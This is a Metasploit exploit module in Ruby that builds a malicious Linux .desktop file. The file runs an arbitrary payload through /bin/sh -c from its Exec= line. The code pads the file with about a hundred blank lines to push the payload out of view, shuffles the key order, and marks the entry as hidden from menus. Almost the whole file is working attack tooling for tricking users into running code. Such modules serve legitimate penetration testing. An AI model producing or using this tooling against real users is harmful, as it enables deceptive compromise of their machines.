##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
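class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious XDG Desktop File',
        'Description' => %q{
          This module creates a malicious XDG Desktop (.desktop) file.

          On most modern systems, desktop files are not trusted by default.
          The user will receive a warning prompt that the file is not trusted
          when running the file, but may choose to run the file anyway.

          The default file manager applications in some desktop environments
          may impose more strict execution requirements by prompting the user
          to set the file as executable and/or marking the file as trusted
          before the file can be executed.
        },
        'Author' => [
          'bcoles'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
        ],
        'Platform' => %w[linux unix solaris freebsd],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2007-02-06',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The desktop file name.', 'msf.desktop']),
      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
    ])

    register_advanced_options([
      # Blank lines inserted between the visible keys and the Exec= line.
      # Presumably pushes the payload out of the first screen of a file
      # manager preview or editor; the spec allows blank lines anywhere.
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
    ])
  end

  # Value written to the Name= key.
  #
  # @return [String] APPLICATION_NAME when set, otherwise 6-12 random letters
  def application_name
    name = datastore['APPLICATION_NAME']
    return rand_text_alpha(6..12) if name.blank?

    name
  end

  # Escape a shell command so it survives as a single double-quoted Exec=
  # argument and reaches /bin/sh -c intact.
  #
  # Two layers of the Desktop Entry Specification apply to the Exec= value:
  #
  # 1. The quoting rule for Exec arguments: inside double quotes the launcher
  #    strips a backslash before `"`, backtick, `$` and `\`, so each of those
  #    characters in the command must be preceded by a backslash.
  # 2. Field-code expansion (%f, %u, %k, ...), which the spec says is applied
  #    after unquoting. A literal percent sign must therefore be written as
  #    `%%`, otherwise a payload such as `date +%s` is mangled by the launcher.
  #
  # Backslashes are doubled (one escaping layer only), matching what this
  # module has always emitted. NOTE(review): the spec also applies the
  # string-value escape (`\\` -> `\`) before the quoting rule, which strictly
  # calls for four backslashes per literal one; confirm against the target
  # launcher before changing this.
  #
  # @param cmd [String] the command to run under /bin/sh -c
  # @return [String] the command escaped for a double-quoted Exec= argument
  def escape_exec_argument(cmd)
    # Block form avoids gsub's backslash-sequence processing of the
    # replacement string: one backslash in, two backslashes out.
    escaped = cmd.gsub('\\') { '\\\\' }
    # Must run after the backslash pass so the backslashes added here are
    # not doubled in turn.
    escaped = escaped.gsub(/["`$]/) { |c| "\\#{c}" }
    # Percent is not touched by either pass above, so order is irrelevant.
    escaped.gsub('%', '%%')
  end

  # Build the .desktop file and hand it to FILEFORMAT#file_create.
  #
  # Layout: the [Desktop Entry] group header, the static keys in a random
  # order (presumably to vary the file between runs), PrependNewLines blank
  # lines, and finally the Exec= line carrying the payload.
  def exploit
    # The spec says desktop entry files should carry the .desktop extension;
    # a different suffix is likely to be opened as plain text instead.
    filename = datastore['FILENAME'].to_s
    unless filename.end_with?('.desktop')
      print_warning("#{filename} does not end with .desktop; the file may not be treated as a desktop entry")
    end

    entry_keys = [
      'Type=Application',
      "Name=#{application_name}",
      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
      'NoDisplay=true',
      'Terminal=false'
    ]

    # String#* raises ArgumentError on a negative count; clamp to zero.
    padding = [datastore['PrependNewLines'].to_i, 0].max

    desktop = "[Desktop Entry]\n"
    desktop << entry_keys.shuffle.join("\n")
    desktop << "\n"
    desktop << "\n" * padding
    desktop << "Exec=/bin/sh -c \"#{escape_exec_argument(payload.encoded)}\""

    file_create(desktop)
  end
end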